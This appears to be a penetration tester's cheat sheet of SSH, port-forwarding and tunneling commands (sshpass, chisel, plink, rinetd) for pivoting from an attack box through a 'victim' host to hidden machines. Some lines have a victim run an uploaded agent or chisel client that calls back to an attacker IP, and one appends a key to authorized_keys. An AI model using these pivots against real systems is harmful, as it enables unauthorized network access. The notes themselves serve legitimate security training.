Random
Load all ssh keys
eval "$(ssh-agent -s)"; ssh-add ~/.ssh/id_rsa*
Check Loaded keys
ssh-add -L | ssh-keygen -l -E md5 -f - | awk '{print substr($2,5)}'
Retrieve Vagrant SSH information
vagrant ssh-config
sshpass -p 'mypass' ssh user@_RHOST_
scp user@RHOST:/_RFILE_ _LFILE_
Do not corrupt the knowhosts file
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" user@host
ssh unable to negotiate - no matching key exchange method found
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc user@host
Send custom command via ssh
sshpass -p Pass123 ssh [email protected] -t 'cd /dev/shm/; chmod +x agent; ./agent -connect 10.10.10.10:11601 -ignore-cert'
ssh [email protected] "ping vpnip"
# sudo apt install ncat
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:8080 %h %p' [email protected]
We can also run scp with the proxyCommand like such
# ~/.ssh/config
Host 10.4.215.215
ProxyCommand ncat --proxy-type socks5 --proxy 127.0.0.1:5000 %h %p
then the command will be
scp chisel_exercise_client [email protected]:/tmp/chisel_exercise_client
Fix “SSH Too Many Authentication Failures”
# Forces ssh to only use the authentication identity files specified on the command line
-o IdentitiesOnly=yes
Login
chmod 600 <ssh key>
chmod 400 id_rsa
ssh -i id_rsa [email protected]
ssh <user>@<ip> -i <private key>
ssh-keygen -t rsa -b 4096
cat id_rsa.pub | pbcopy XXX
echo "SSH key data" >> ~/.ssh/authorized_keys"
Check hidden machines
kali => victim machine => hidden machine
List port forwarded on victim machine
sudo cat /root/port_forwarding_and_tunneling/ssh_local_port_forwarding.sh
Check interfaces connected
ip a
rinetd Port Forwarding
local:80 => 212.12.12.1:80
0.0.0.0 80 212.12.12.1 80
verify rinetd is listening
ss -antp | grep "80"
SSH Tunneling
Background the forward -fN
local:8080 <= 10.11.0.4:3306
Local forward (kali to victim)
ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER
ssh -N -L 1234:127.0.0.1:80 [email protected]
ssh -N -L [my_address:]my_port:victim_host:victim_port [user@address]
Remote forward (from victim to kali) 10.11.0.4:3306 => local:8080
$(in victim) ssh -N -R 10.11.0.4:3306:127.0.0.1:8080 [email protected]
Dynamic forward Forward any traffic to victim
$(in kali) ssh -N -D 127.0.0.1:8080 [email protected]
sshpass -p "password" ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -D 1080 -N -C -f -q [email protected] -p22
-D 1080: Opens a SOCKS5 proxy on local porrt1080-f: Requests SSH to go to the background itself before executing the command-C: Compresses data before sending it-q: Quiet mode doesn’t show any output-N: Doesn’t execute remote commands, useful for just port forward (protocol 2+)
Chisel Tunneling
REMOTE
Attack box
./chisel server -p LISTEN_PORT --reverse &
Victim host
./chisel client ATTACKING_IP:LISTEN_PORT R:socks &
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &
LOCAL
Victim
./chisel server -p LISTEN_PORT
Attack box
./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@atacker -i KEYFILE -N